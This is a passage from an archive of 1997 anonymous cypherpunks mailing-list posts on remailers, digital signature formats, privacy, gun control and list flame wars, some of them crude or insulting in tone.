     anonymity," said the only real way to measure the problem is by
     looking at how many complaints there are about the use of software
     that protects a user's identity.      The pattern Cottrell has seen suggests that as use of anonymous
     remailers and the like increases, complaints about faceless harassment
     and other abuses have declined. His simple thesis for the dip:
     Anonymity tools are quickly becoming familiar, and users are
     becoming more responsible in their use.      Cottrell, who is also president of Infonex Internet Inc., owner of the
     popular Anonymizer email and Net access service, said that, given the
     deeper personal-freedom issues inherent in the anonymity issue, it's
     crucial that such services become profitable.      "There's only 15 or 20 of them [anonymous remailers] in the world, and
     they're all run by volunteers. Those volunteers are under a lot of
     pressure and are taking significant risks," he said.      Dealing with law enforcement requests for information comes with the
     territory, for instance. When confronted with such demands, Cottrell
     said, "We comply completely and give them everything we have -
     which is nothing. The FBI, so far, is content [to be given] log files with
     nothing useful in it."      Overseas, police have tried to get information a "handful" of times, he
     said. Austrian and German agents have come to Infonex to find out who
     is hosting a Web site that includes Nazi propaganda - a site run by
     Austrians but illegal in their home country.      But, Cottrell said, just as the people behind that site trust the company
     with their anonymity, so too can human rights organizations, which
     will increasingly be using anonymous remailers in the future.      "Groups of people will be putting their lives in our hands, very
     literally," Cottrell said.

@_date: 1997-11-26 07:08:21
@_author: Anonymous 
@_subject: Further costs of war 
Hmmmm.... Isaac Newton, Tom Paine, and Alan Turing were all British.
Looks like a pattern!
(And the Great ur-Cypherpunk, Thomas Jefferson, was born British.  ;-)
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-26 08:02:09
@_author: Anonymous 
@_subject: Whining 
My heart bleeds for you.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-26 08:08:25
@_author: Anonymous 
@_subject: Quoting Portions of a Signed Document 
Ugly's the word for it, alright. ;-)
It would be nifty if there was a way to show that any continuous set
of bits were signed given only one signature on a whole document.
Intuitively, it seems to me that this might be provably inconsistent
with a secure hash.  Still, crypto results are full of surprises, so I
could imagine there is a way to do this.
Good point.  It is nice that people who quote out of context now in a
misleading way are convicted when you demand proof.
Still, my sense is that this would be a pretty useful thing to be able
to do and it would be technically interesting.
For example, you might want to reveal parts of a message signed by
somebody else without revealing the entire message.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-26 08:49:21
@_author: Anonymous 
@_subject: Freemen and Serfs 
There is a widely held belief that cryptoanarchy is an all or nothing
proposition; that is, the future can be a glorious cryptoanarchy or a
dismal police state.  (I think this is Tim May's analysis, but perhaps
others also contributed.)
It isn't clear to me that these two environments cannot co-exist in a
stable equilibrium.  Historically, in many societies which practiced
slavery, large numbers of people were neither slaves nor slave owners.
Given the naivete of large portions of the population and certain
alarming technologies such as implants which are emerging, it seems
clear that large numbers of people will become little more than cattle
in the near future.  (Incidentally, I do not know that this will be
"Joe Sixpack" and his friends.  Many of those who are "success"
oriented are also most willing to be drug tested, the most reluctant
to question authority, and the least reluctant to be little more than
a cog in the machine.)
In any event, those who perceive their environment and respond
correctly may continue to be free while others will take the other
path.  It's tragic, of course, but perhaps not our problem.  Monty
Cantsin is willing to spend only so much time and effort encouraging
people to protect their privacy.
There's no reason why cypherpunks can't do business with the slavers.
That is, in exchange for various products requiring actual work,
cypherpunks (a.k.a. knowledge workers) can provide technical expertise
and other services.
Once it is clear that enslaving a cypherpunk is expensive, it may be
that the slavers of the world discover they can live with it and that
it may even be a good deal for them.
There might be some turmoil getting to that point, of course.  Many
U.S. citizens have been told they were free, although the ruling elite
tends to see them as chattle.  This difference of opinion will have to
be resolved one way or another.  Hopefully it will be done peacefully.
Perhaps instead of seeing ourselves as "The Sons of Liberty" we should
see ourselves as "The Sons of Tleilax".
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-27 13:47:20
@_author: Anonymous 
@_subject: Moderated vs. Unmoderated Lists 
The issue is not moderation.  It is whether this list has a focus, a
central set of ideas, a reason for existence.  If we're just going to
talk about whatever anyone finds interesting, there is nothing to stop
the list from drifting away from its goals.
In fact, that is exactly what has happened.  Tim May's violent rhetoric
has attracted others who believe in violence.  Vulis's racist and sexist
comments have brought other members who are comfortable expressing
negative comments about other races and nationalities.  There is little
discussion about cryptography any more.
Tim May:
What difference does it make whether it has crypto anarchy relevance?
No one cares about that any more.  The only thing that matters today
is whether it includes crypto racism, or crypto terrorism, or crypto
white supremacy.
Writing off-topic essays isn't the problem.  Posting them here is.  Why
don't you use alt.fan.oj-simpson for your racist rants like you used to?

@_date: 1997-11-29 11:45:59
@_author: Anonymous 
@_subject: "Good job NANAE. You really fucked up royally."  -- DataBasix 
^^^^^
Netcom is now requiring "truth in labelling", eh?
I'm sure we'll find out soon enough, since you seem to be so intent
on taunting your readers with your latest mischief.  If you're dying
to tell us, then feel free to do so.  Otherwise, drop it.  Your call.
So you can claim that anything you posted that later proves to be
too embarassing was "forged", right?  That's a lot easier to do if
you don't sign them with the PGP key which you keep advertising in
your bloated .sig, and you make sure they aren't archived by any
NEUTRAL third party.  (Remember when you called someone else [who
shall remain nameless at his request] a "coward" for hiding HIS
posts behind an "X-No-Archive" header?)
Many readers will remember that you were whining pitifully a few
months ago about how remailers were allegedly being used to "forge"
posts in your name.  You were given several suggestions, one of
which was to install PGP, generate a key, and use it to sign *ALL*
of your genuine posts.  Your huge .sig now contains the fingerprint
of a PGP public key that YOU ARE STILL NOT USING.  Still trying to
maintain "plausible deniability" for your posts?
And then a few weeks ago you butted into technical question posted
to alt.privacy.anon-server about Private Idaho with the implication
that the person asking the question wanted to know the answer so
that he/she could commit "forgery".  If you're so concerned about
forgery, why have you not bothered to try what was already suggested
the last time you launched into your "remailer users are abusive
assholes" tirade?
Then why did you demand that Jeff violate the privacy of all of his
users by turning over his user logs to you and Belinda Bryan
?  And when he said that the only condition
he'd release them was in response to a letter FROM YOUR LAWYER,
Belinda Bryan sent such a letter?
Perhaps the remailer users would like to know what purpose you had
in mind for demanding the e-mail addresses of EVERYONE who either
SENT or RECEIVED anonymous mail through Jeff's remailer.
It's your abuse that's not going to work anymore.  You've cried wolf
once too often about "abuse", "forgery", and other imagined
offenses.  The remailer operator did not "prove me wrong".  Reread
his post when you're sober:
  Just to refresh your memory, you were asked whether you had asked
Jeff Burchell to censor any anonymous posts that mentioned your
name.  You stonewalled the question, flippantly suggesting that
he/she ask the operator.  Someone did just that, and Jeff's post is
the result of that.  Looks like you gambled and lost that time!
You can call remailer users "liars" and "anonymous assholes" to your
heart's content, but your censorious actions and those of your
associates at DataBasix speak for themselves.

@_date: 1997-11-29 12:52:14
@_author: Anonymous 
@_subject: Microsoft Rides Again 
Micro$oft fucked me up the ass. Please help. I'm bleeding to death.

@_date: 1997-11-30 06:22:27
@_author: Anonymous 
@_subject: Message 
"On the Internet nobody knows I'm a dog unless I want them to,"
to rephrase a well known cartoon.
Why not set up a website where minority websurfers could go to read about privacy issues and how pseudonymity is to their (and everyone's) benefit.  After all, how can another person discriminate against you when that person knows practically nothing about you (e.g., name, age, race, religion, geographic location, etc)?  This would be an excellent way to expand cypherpunk technologies, don't you think?

@_date: 1997-11-30 08:44:15
@_author: Anonymous 
@_subject: The Illusion of Freedom 
Oh, I see what you mean now.  Thanks for the explanation.
Leaving the loser to slouch off toward Doorn, St. Helena, or Asuncion
to die.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-30 09:34:13
@_author: Anonymous 
@_subject: This would also explain AOL... 
Mark Grimes: "Why do 39,440 people a month look up "Yahoo" on   Yahoo!? Maybe too many ate lead paint as children." A recent compilation of the 200 most popular keywords submitted to the Yahoo! Search engine offers some insights about the types of individuals that prowl the Web.
"Baywatch" babe Pam Anderson racked up 172,760 inquiries in a recent month to place 12th--two places behind "weather," 10 places ahead of "Microsoft," and 92 slots before "Bob Dole."   Janet Reno could fine Pamela an inch a day until she ranks equally
with Bob Dole, as a sex symbol. (3,000,000 places ahead of Reno.)
Good News:
"Metallica" (59) finished just ahead of "real estate" and "stock quotes"; at No. 82 "anal sex" was just before "cars" and "USA Today."
Bad News:
"Days of Our Lives" (91) came up more frequently than "marijuana" (93) and "Beatles" (111)."
The top 50: sex, chat, Playboy, Netscape software,
nude, porno, games, porn, weather, Penthouse,
Pamela Anderson, pornography, pussy, Persian Kitty,
maps, Halloween, music, adult, chat rooms, erotica,
Microsoft, jokes, shareware, magazines, pictures,
employment, jobs, erotic, gay, Jenny McCarthy,
Netscape, bondage, lingerie, hardcore, Cindy
Crawford, Hustler, ESPN, supermodels, Disney, Star
Wars, girls, movies, Star Trek, mIRC, genealogy,
screen savers, Japan, soccer, and tits.   I suppose that a more cynical mind than mine might make much of
the fact that the comma between 'Microsoft' and 'jokes' may well
be a 'typo'.
  As to why both mentions of Netscape's name are followed by a
plethora of requests for information on various forms of sexual
perversion, I would like to point out that I am not the *only*
person who uses Netscape and Yahoo, so it obviously could not
be *totally* due to my search habits.

@_date: 1997-11-30 11:48:07
@_author: Anonymous 
@_subject: Digital Signatures 
You can't see it up here, but this is a signed message using a
protocol which is modestly titled "Cantsin Protocol No. 1".
Suggestions for improvement are most welcome.
At the bottom of this message you will find a series of hexadecimal
numbers expressed in ASCII which comprise the signature.  I considered
using ASCII armor or uuencode to store the information, but the
straight numbers are easier to work with.  That is, the components of
the signature are easily manipulated using off the shelf tools such as
Perl.  Also, because certain numbers are freely accessible, the
message is easy to filter without necessarily calling other programs.
It makes it easy to find signed messages using search engines which
are not necessarily aware of encryption protocol formats.
Having the numbers exposed has a nice feel.  It lets you see exactly
what is going on.  It encourages people to investigate the meaning of
the numbers and to think about the information a signature really
Cantsin Protocol No. 1 uses El Gamal to sign hashes generated by SHA1.
Executive summary of the signature format:
The first line is "16A5942B6EED349ECF4594C784DFD177 [Cantsin Protocol
No. 1]".  The hexadecimal number was chosen randomly and is the
indicator that this is a Cantsin Protocol No. 1 signature.  The number
was chosen randomly and it is somewhat unlikely that anybody else will
accidently choose it.  The text following the number is just there so
a human reading it will know what they are looking at.  No program
should rely on that text.
The signature begins where the code (i.e., "16A59...") begins - it
need not be preceded by a newline.  (It can be used to sign anything,
in other words.)
The public portion of an El Gamal key consists of three variables p,
g, and y.  p is a large prime, g is a randomly chosen number, and y is
computed using the secret key.  (See "Applied Cryptography" for the
details.  I'm using Schneier's nomenclature.)
Monty Cantsin's public authentication key is:
p: E0D087F3BA00B808E24606F13681AEAE702E2FD49F52DBBFB7B6C67606183FE42466FBB953858C3E618BED52E6EB15A0AFD4607AEA3B4D747A4A3A5D3CDDA0FB5DE59115ACCEC4E1F7A95D81814CF0CB0CA5F2342C809F92533CE1EEE96C352D6116A88B353881B594036C317A0EED2AE62FDEE4A7D8BBF077CCD8702268FD16FBDC7100A35BF9C02D187871B2F727D654174A73A72C2E24C9EA1826322779FDE2E21BF6DF99A895C379362FB45DF54CAE1CD3609DFCF3EC60E8C0513C87FF6EA46083CE1074491EDB63F804DCDCACAE3755739951D2FE22C57601DAD1742AE543209D107A32EAFE45976104190C759E1B50763EA3E3526FED3ED4F567DC00B9
g: 5B4A84924FFF2B5282DA28879EFA3017D316F8B76FF153D2A647C53BF557E68A62C6F644719683C4A249EB9892DC3B2EADCFF55D2BFC371482563CA38D628C35BF717EE3A1CF6BCED68BAFF584C5F2F7163D9154707B39A13622E790ABE5723E4725CFC434488DD2E28C682F7C8A3FF99BA6A7E4A9EFAF35599D674FB0326BD1E36460AEE2752CD485CAA29758BFDF46F31D8614A5F820EE7F570AEA7F3E2ECF94CBB4A9482AF64C5ACC9319FCA2E990B978CC4A023AE82CB8972CE66BC45C4EF3E5BF25349096F46B78D265D39C253FDC4498D52D2283660FA5616DB26D6FED62E4C4509D316577A06DE75BFCA196D77573602F72C634D93121F7E61A480024
y: A7006552F14B2F34E80B79BD51558578771327BA2E758109F28C9C455E620ADF475C8513DF4466717961FC82A979110D8389C9CE740EBFAFB57F53B443F311F62B17814BBC2967DE63879B18B7E22E0998EA6615DF599FB956FE4A5F20BEB26E81F7BFE275FAD9F98E139E31E621229FA525246B30F626B90935B37AF2CB22956419CADBD4FB3A9EAF5E3821D8EA10327167BA1A34D04F6EF23F40F2857F071497398E4DDACAA8840F062433AF29A3705F7CAD7CF5F4F59C56EC7228AE011D372C4DE6D6708971400B70401573E9832142DF5CB56726103093F6290F6EF9E9FAD75A4786917ED6F97862F1D7E66CDCB874981B8DB088B101689FF6103D431824
(This key should not be used for communication.  It is not very well
secured.  Also, I like Adam Back's assertion that authentication keys
should be different from communications keys.)
The second line in the signature is an SHA1 hash of the public key.
The hash is computed on the concatenation of the hexadecimal ASCII
forms of p, g, and y respectively.  There should be no leading zeros.
(Remember to leave off the newline!)
The third line is an SHA1 hash of the message itself.
The fourth line contains an offset and a length to specify the area of
the text which is signed.  The offset is relative to the signature
itself.  That is, the first character of the Cantsin Protocol No. 1
code is at position 0.  As signatures are usually appended, the offset
will usually be the additive inverse of the length.
This is an unobtrusive and highly flexible signature format.  No text
is modified to accommodate the protocol.  No information needs to be
prepended to the text.  This means that signing a document only makes
it longer at the end - the area a reader cares the least about.  You
can sign as often as you like and it won't really matter that much.
This protocol could be used to sign The Declaration of Independence.
Not only that, but it is possible to be highly selective in what is
signed.  The user could sign a portion of a message without modifying
or sabotaging other signatures.  It is completely compatible with
other signature formats.  Not only can you sign the subset of text
which another user signed, but signatures can even overlap.
The last two lines are the signatures themselves.  El Gamal signatures
consist of two values which Schneier calls "a" and "b".
Note that the signature does not contain a time stamp!  Users who want
time stamps can add one in the text.
El Gamal is simple enough that the signature on this message can be
checked using standard Unix tools such as dc version 1.1.  Let's say M
is the SHA1 hash of the message.  It is checked by verifying the truth
of this equation: (y^a * a^b) mod p = g^M mod p.
(dc version 1.1 has an | operator which is used to compute equations
of the from a^b mod n like: a b n |.  The left side of the equation
will be easier to compute if you compute ((y^a mod p) * (a^b mod p))
mod p instead.)
You also need to be able to compute SHA1 hashes.  I've been using
something called "sha1file" which, I believe, originated at Adam
Back's web site.
I have some crude tools for making and verifying these signatures, but
they still need work.  At some point they will be released into the
public domain.
Aside from ordinary message signing, there are at least two good uses
for these signatures.
One is for timestamping services.  Since the signature is unobtrusive,
it would be easy to route a message to all known timestamping
services.  The timestamp can only fail if all timestamping services
fail.  Yet, the message would still be completely readable without any
garbage at the top.
Another is for authenticating messages from the distributed
cypherpunks mailing list machines.  Right now it would be somewhat
ugly to have all three machines signing every message.  But, with this
protocol it just makes each message a little longer.  This would
prevent certain kinds of attack and make it harder to exploit a
compromise of any of the mailing list machines.  (It's harder because
an undeniable trail of inconsistency is left even if the compromiser
has the power to sign messages at will.)
Monty Cantsin
Editor in Chief
Smile Magazine
-1CB9 1CB9

@_date: 1997-12-01 00:13:57
@_author: Anonymous 
@_subject: New free speech oriented civil rights site 
Members of abused minority groups should be pretty much in sync with a
lot of concerns held by cypherpunks.  When we talk about police
brutality and concentration camps, most of us, as well as our friends
and relatives, have little direct experience.  This is not true of
many members of minority groups.
Sounds like a nice project.  Good luck!
If we do our job properly, the cypherpunk public image won't
matter. ;-)
White males are a minority group.  Also, I believe you are
overestimating the effects of racism when it comes to hiring talented
technical professionals.  If not, there is a tremondous arbitrage
opportunity out there.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-12-01 02:46:31
@_author: Anonymous 
@_subject: [RePol] Denizen 
Rabid Wombat sayeth:
Ah, another easy gold for the U.S. Would the people who had him disbarred be
allowed to compete, or are they considered "professionals" in this event?

@_date: 1997-12-01 06:08:57
@_author: Anonymous 
@_subject: Minsky skeptical of privacy 
There is a curious belief implicit in this statement.  Nobody wants a
backdoor in their own privacy.  This means that the overrides will
have to be mandated by law.
Thus, what Minsky is arguing against is the right of people to protect
their own privacy.
It is possible that Minsky is unaware of how ineffective these sorts
of laws are.  Today we have many laws regarding financial secrecy and
the like.  However, there are people who are able to get this sort of
information fairly routinely.  These people tend not to be poor.  They
tend to be close to employers.  The tend not to advertise what they
Not to mention the fact that legal systems and governments can flip
into bad modes where they exploit the authority with which they have
been entrusted.  It is somewhat naive to claim that any government is
not prone to this and that it hasn't happened repeatedly throughout
all of human history.
This is a cute line and I'm sure it was a hit with the crowd, but
telephones are a major problem.  We can tell how much illegal
wiretapping is going on by the which authorities by how loudly they
scream when people - people who have not been tried or convicted of
any crime! - start encrypting their conversations.
Incidentally, does anybody know what percentage of the research
funding Marvin Minsky has used in his career was directly or
indirectly related to the defense establishment?
The interesting thing about the privacy "debate" is that there is an
exceptionally high correlation between opposition to privacy and the
consumption of public money.
Monty Cantsin
Editor in Chief
Smile Magazine
-A24 A24

@_date: 1997-12-01 06:28:30
@_author: Anonymous 
@_subject: Updating the white bit 
One benefit of making your living through a wire is that your end of
the wire can be anywhere you like.  So, if you want to be surrounded
exclusively by members of Group X, you are free to go live in some
commune populated exclusively with the members of that group and still
make a living.
To the extent that racism is caused by ignorance, the Net will tend to
reduce it.  But, is this claim really correct or is it simply a slur
against racists?  (The implication being that all U.S. racists live in
the South and that Southerners aren't that smart.)
I believe that many people are racists because they like to be that
way and that more knowledge about other racial groups isn't going to
change that.  Knowledge about someone is not synonymous with liking
them or forming a relationship with them.
The people who are working themselves up into a panic regarding "hate
speech" would appear to agree with me on this point.  What they fear
is that certain ideas will "spread".  That is, as certain people are
exposed to ideas and knowledge they did not have before, they will
become racist or more racist than they already are.  In other words,
there are groups of people who cannot be trusted to think for
Oh, you mean the majority group?  The majority group will always
protect its own privileges.  Look how many men are in jail when
compared to women.  Clearly men are an oppressed group. ;-)
Seriously, people like to spend at least some of their time with
people who are a lot like themselves.  This is true of just about
every person on the planet.  A common theme in the United States at
this time is that it is wrong for white males to behave this way, but
it is not wrong for anybody else to behave this way.
Monty Cantsin
Editor in Chief
Smile Magazine
-8FE 8FE

@_date: 1997-12-01 09:00:58
@_author: Anonymous 
@_subject: Death Penalty Expanded 
How dare you inquire into the nature of physical reality!  Officer,
please arrest that man.  ;-)
Monty Cantsin
Editor in Chief
Smile Magazine
-203 203

@_date: 1997-12-01 09:38:21
@_author: Anonymous 
@_subject: Quoting Portions of a Signed Document 
Thanks to everybody for their interesting contributions to the partial
signature problem.
This approach looks like the best to me.  It's a bit cumbersome for
the person doing the quoting, but that's as it should be.
It's easy to see why we would want other people to sign with
signatures which enable partial quoting, but it's less clear why we
would sign our own messages this way.
For instance, somebody might want to quote my private e-mail out of
context where I say "Yes, I'm real glad I got rid of that guy.  He was
really a pest."  But they might not want to quote the part of the
message where I say "Thanks for the latest shipment of plastic
explosives."  In order to authenticate their claim they have to reveal
the entire message.  If they must quote the entire message for
authentication, it will discourage tacky behavior such as relaying
private messages.
So, this is sort of a solution looking for an application.  It seems
like an interesting problem and I have a strong intuitive sense that a
use for it will present itself at some point.
Monty Cantsin
Editor in Chief
Smile Magazine
-9DD 9DD

@_date: 1997-12-01 10:07:48
@_author: Anonymous 
@_subject: Freemen and Serfs 
This model of "sheeple" doomed to slavery while cypherpunks comfortably
live independent of the state is even less plausible than the original
idea of crypto anarchy.  It appeals to our elitist instincts and makes
us feel comfortably superior, but it has little connection to reality.
This idea overlooks the "fax effect", where the value of a technology
rises in proportion to the number of people who use it.  Cypherpunks will
have to set up a virtual Galt's Gulch, trading only with themselves,
and unlike in Rand's fantasy the limitations of such an economy will
soon be apparent.  Early cypherpunk experiments like "Magic Money"
showed how pointless a virtual cypherpunk bank would be.
Cypherpunk technologies create a protected boundary within which
transactions can be conducted free of third party surveillance and
tampering.  Only by extending this secure boundary to include the
masses will there be enough value generated within the secure region
to be worthwhile.  Cypherpunks who can only trade and work for each
other will not be able to generate sufficient economic growth to survive.
In an increasingly interdependent world economy, the only hope
for cypherpunk technologies to succeed is to extend them as far as
possible throughout society.  This includes reaching out to foreigners
and minorities, to the dismay of some cypherpunks.  We must oppose the
elitism and racism which some list members cling to, replacing it with
inclusion and openness to members of other cultures.  Making fun of
foreign accents and calling for the deaths of innocents does not move
us toward our goals.

@_date: 1997-10-01 16:07:51
@_author: Anonymous 
@_subject: Secure HTTP servers. 
Congratulations on your new job at Microsoft.
  For info on secure http servers, you might want to check with
Netscape, for starters.
  Always willing to help out newbies.
THE .987 LIE

@_date: 1997-10-01 16:28:30
@_author: Anonymous 
@_subject: Remailers and ecash 
Latency may be a means to get security in the current remailer design,
but it is a means to the end and not the end itself.  This doesn't
mean we shouldn't use latency to get security, but it is undesirable,
like using cinderblocks for construction.  The reason I point this out
is that it is important to separate design choices to achieve a goal
from the goal itself.
If we had a remailer network in which each customer had a constant
bandwidth connection to one or more remailers, you could have zero
latency mail. (Actually, this would be nice to use with those Comsec
It is my understanding that serious naval vessels like aircraft
carriers use constant bandwidth channels to defeat traffic analysis.
That is, to every place they might wish to communicate, they
continuously broadcast encrypted information.  Most of the time the
channel is empty, of course, but nobody outside can tell when.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-01 18:20:00
@_author: Anonymous 
@_subject: Remailer Attack 
I will seriously consider it.
Were I to do this, I would like to donate the money to the EFF,
preferably through an ecash payment.  Then, you can buy a 486 you
consider to be suitable.  Also, donations to the EFF are tax
deductible, are they not?
What would be the odds of naming it the "Cantsin Remailer"?  Just
curious.  ;-)
The more I think about affinity remailers, the less off the wall they
seem to me.  It would really be rather neat if EFF supporters could
send a message through your remailer and then have the outgoing
message stamped with the amount contributed.  For those operating
anonymously it buys a mild amount of credibility, but you could also
imagine people sending non-anonymous messages through it: "See
everybody!  I gave $100 to the EFF!"
The publicity alone would probably be worth it for the first
organization to start doing this.  It should be good for a few
newspaper articles.  And it's certainly a novel and fun way to raise
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-01 23:47:51
@_author: Anonymous 
@_subject: The War on Drugs--Surrender! / Re: INFO-RUSS: Reuter: Russian+Russian Drug Cartels (fwd) 
Legalize drugs!
The War on Drugs *created* all of the current problems in this area
by making minute amounts of forbidden substances worth more than
precious metals.
If we make sugar illegal, so that it sells for hundreds of dollars a
gram, people will steal and kill over it. If we legalize it, the deaths
will stop.
The government would have us believe that the 'bad guys' are killing
each other and ourselves and our neighbors over substances that cost mere pennies to produce.
Bullshit. They are killing over the insane profits to be had from
cheap products which are selling for outrageous prices as a result
of the War on Drugs.
Bottom Line: You and I may have to die in order for the government to
attempt to prevent someone else from killing themself.
Makes sense to me...

@_date: 1997-10-02 04:07:17
@_author: Anonymous 
@_subject: "Show me an example of terrorists using the Internet or crypto" 
Although guns are obviously designed for killing things, this does not
mean that they will be used.  This can be seen from the statistics.
There are far fewer murders than there are guns.  Almost all of them
are never used for killing someone.
You are also not considering the case where one person has a gun and
another does not.  The situation is more stable if both people are
armed.  (And don't claim you are talking about disarming a whole
society.  You aren't, just part of it.)
Depends who they are.  Bet the Dutch resistance made good use of their
weaponry, eh?
This is simply untrue.  TV and movies are not the best way to form an
understanding of another country.
I read recently that 9000 people a year die in the United States from
food poisoning.  This should be almost entirely preventable.  Why
isn't this a big political issue?  Could it be that the people pushing
gun control do not have entirely pure motives?
Be aware that the gun control lobby has often used misleading
statistics.  For instance, you will hear a lot about "handgun deaths".
It turns out that most of these are suicides.  While undesirable, most
people perceive a difference between somebody killing themselves and a
nutcase doing his thing at a school.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-02 12:19:09
@_author: Anonymous 
@_subject: Request for illegal electronic surveillance examples and cases 
I'd figure pretty much anything from Bamford's _The Puzzle Palace_ would
work, but the stuff on Operation Shamrock (interception of cable traffic)
might be of particular interest. Also the parts about "intelligence sharing"
with the Brits and Australians -- just because the NSA can't tap it doesn't
mean they can't get it from our "friends." No doubt the Men From Fort Meade
have been as helpful in the other direction as well.
A particularly nice detail about Shamrock is that the FBI was using the NSA
to conduct warrantless electronic surveillance of "un-American" groups by
using ELINT, which was -- of course -- "born classified."
I'd cite details, but my Bamford seems to be MIA. Maybe the MIB came for
it. . .

@_date: 1997-10-02 12:59:27
@_author: Anonymous 
@_subject: Remailers and ecash (fwd) 
[snip stuff about message pools, singapore, clams, tv shows, etc]
The question is will people pay money for this.  Nobody gives a damn if you
think it's useful or not.  The customer is always right, and all that.
Obviously, some people had a reason to take the time to write those thousands
of posts, the question is will they pay the remailers to post them.

@_date: 1997-10-02 13:27:14
@_author: Anonymous 
@_subject: Remailers and ecash 
Given: We want more (reliable) remailers
       But someone has to pay for them
Conjecture: New remailers can be financed by charging the users a fee per
            message to use the remailers.
   If a remailer charges a fee, the number of users will be reduced to
   those who are willing to pay the fee.
   When the number of users is reduced, the potential for traffic analysis
   is increased, which reduces the value of the remailer.
   If the value of the remailer is reduced, it will not be worth the cost
   to many users, and those users will seek a less expensive, higher
   traffic remailer.
   Thus, the commercial remailer is forced to lower its prices until it is
   unprofitable.
Conclusion: Pay-per-message commecial remailers are not economically viable.
Hence we need a new economic model to finance remailers.
Several have been proposed:
 - Advertiser supported
 - Pay a flat fee per month for remailer access
 - Everyone a remailer.  Remailers only accept messages from other
   remailers.  To use remailers you must run a remailer.
 - Get companies to run remailers on their firewalls to reduce traffic
   analysis by competitors/spies
 - Pay for access to an anonymous message pool
 - Sell a spam filtering service to fund remailers
 - Sell a spamming service to fund remailers
 - Sell cpu cycles in exchange for remailer access
 - Charge people for extra services, such as low-latency
 - Pay for a nym account, nymserver subsidizes remailers
 - Have the money launderers subsidize the remailers
 - Somehow get all those Mac users to pay
 - Offer $50 to the first person to set up a remailer, as Monty Cantsin did
 - Fund social programs for universal remailer access and universal health
   care like Cynthia wants

@_date: 1997-10-02 16:13:23
@_author: Anonymous 
@_subject: Fwd: Re: Quor's cypher 
Wouldn't this only happen (on average) in one out of every 65536 p-c
pairs?  Since the state array is changed entirely with every 128 bytes
encrypted, 1 out of 2^16 doesn't seem to help much.

@_date: 1997-10-02 20:53:42
@_author: Anonymous 
@_subject: Stronghold 
You misordered this: it should say "Nor do I have any evidence to No, you're the one trying to torpedo its sales to get back at certain
individuals for some perceived slight.
Amazingly, C2Net doesn't like to see its product publicly slandered by reptiles like Vulis.  If Vulis' opinion were based on anything
other than personal ill will - ie, if he had ever actually downloaded
and examined Stronghold and found any problems with it - he would have
a leg to stand on.  As it is, his allegations are completely unfounded.
Keep in mind that anything Vulis says is in all likelihood a complete

@_date: 1997-10-02 23:42:21
@_author: Anonymous 
@_subject: Stronghold 
C2Net was wrong to censor the cypherpunks list in the guise of moderation.
It was wrong to send threatening letters to people who claimed its
products were weak.  The whole moderation/censorship experiment was a
terrible mistake.  The actions taken by C2Net were completely unjustified.
At the same time, it is dishonest to say that its products have
backdoors or are weak.  There is no evidence whatsoever that this
is the case.
It may stretch the intellects of some cypherpunks beyond the breaking
point to hold these two views about matters at the same time.  In the
black and white world where some cypherpunks live, a company which
tries to prevent criticism is evil, hence it must be fraudulent as well.
More mature list readers will recognize that a company or a person can
be wrong in some actions while being right in other ways.
The burden of proof in claiming that there is a weakness in someone's
security product is on those making the claim.  Compare the unfounded
statements by Vulis with the carefully documented breaks of weak
software by Ian Goldberg, David Wagner, John Kelsey, and Bruce Schneier.
What if Goldberg and Wagner had claimed that Netscape's RNG seeding was
weak, without providing any more evidence than that claim?  What if
Schneier et al had broken cellular phone encryption without backing it
up?  They would have been justifiably ignored.
If anyone really does believe that C2Net's products have backdoors or
weaknesses, why don't they present them?  Either they want people to keep
using C2Net's supposedly broken products, which reflects badly on them,
or they want people to stop but they are unable to present any evidence
of these purported weaknesses.
When Vulis or anyone else claims Stronghold is broken, ask him why he is
presenting his claims in a form which will cause people to keep using
this "broken" software.  Does he want people to have weak encryption?
Is he in favor of backdoors?  If not, he would surely present evidence
of the weaknesses, if there is any.  Make Vulis explain his motivations
when he makes these claims.

@_date: 1997-10-03 01:08:15
@_author: Anonymous 
@_subject: Stronghold 
You obviously didn't know anything about it anyway.
An obvious lie.  Big surprise.
You complied no doubt because you knew that your 'opinions' were baseless,
and that you had no defense to a libel suit.
You have no evidence, Liar.  I'm sure they simply asked you to stop
publishing lies about them.
Actually I'm not. Even so, this is just another wormy tactic to deflect attention from the fact that you're lying.
I have little doubt that this is just another unfounded allegation
from the mouth of Dimitri Vulis, Noted Liar.

@_date: 1997-10-03 04:26:03
@_author: Anonymous 
@_subject: NoneRe: Remailers and ecash (fwd) 
When all your customers are anonymous, you don't get to be very choosy.

@_date: 1997-10-03 05:31:58
@_author: Anonymous 
@_subject: "Show me an example of terrorists using the Internet or crypto" 
Oh yes, I can.  In fact, I believe the opposite is the case.  The
statistics bear this out.  But, your claim was that a weapon will
eventually be used to kill somebody.  I guess it's clear at this point
that this was wildly inaccurate.
You should come to the United States and spend some time around the
shooting community.  The people are real pleasant, real easy to get
along with, and real careful with their weapons.
That can occur, but in general nobody likes to be shot.  Even if you
are going to shoot your opponent regardless, if he has a gun you move
more cautiously.
What would have happened if the Russians didn't develop nuclear
weapons?  I think they would have been nuked sooner or later, don't
And, we aren't talking about an arms race, here.  We are talking about
whether citizens are allowed to own a few rifles.
You will find this difficult to achieve, however.
You are not talking about disarming the police and the military are
you?  Just as I thought: you only want to disarm the civilians.
That's not such a great idea, judging by history.
Are you arguing that the Dutch resistance should not have resisted?  I
believe they did the right thing, myself.  I do not believe it was a
Bad Thing.  I believe it was a Good Thing.  I believe they did not
kill enough people.
No, but it appeared that you may have been misled by them.
Police violence is caused by gun ownership?  I doubt this very much.
Oddly enough, this is mostly true here as well.
It is unclear what is magical about the words "drive by shooting."  I
believe this phrase lacks real content and is simply a trigger for
The implication is that people are randomly firing on people in the
streets.  While this may occur once in a great while, it is extremely
uncommon.  Usually people kill for a reason.  Usually they are trying
to kill their enemies.  In the U.S., this is often related to the
black market.
Whether somebody kills their enemy from a car or not is irrelevant.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-03 10:36:45
@_author: Anonymous 
@_subject: NoneRe: Remailers and ecash 
You don't have to.  You pay someone to bake your bread for you, and you can
pay someone to run your remailer for you.
